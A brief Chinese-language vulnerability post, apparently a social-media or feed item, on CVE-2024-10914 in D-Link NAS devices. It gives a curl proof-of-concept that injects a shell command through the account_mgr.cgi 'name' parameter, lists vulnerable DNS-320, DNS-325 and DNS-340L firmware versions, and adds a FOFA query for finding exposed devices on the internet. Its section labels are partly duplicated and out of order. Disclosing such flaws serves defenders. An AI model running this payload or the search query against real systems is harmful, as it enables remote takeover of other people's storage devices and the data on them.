D-Link NAS 设备中发现了一个严重漏洞 CVE-2024-10914,对全球超过 61,000 个系统构成严重风险。该漏洞是
Exploit:
Affected Devices:
Search query:
#poc
account_mgr.cgi 脚本中的命令注入漏洞,允许远程攻击者通过特制的 HTTP GET 请求执行任意命令Exploit:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
Affected Devices:
DNS-320 – Version 1.00
DNS-320LW – Version 1.01.0914.2012
DNS-325 – Versions 1.01 and 1.02
DNS-340L – Version 1.08
Search query:
FOFA: app="D_Link-DNS-ShareCenter"
#poc
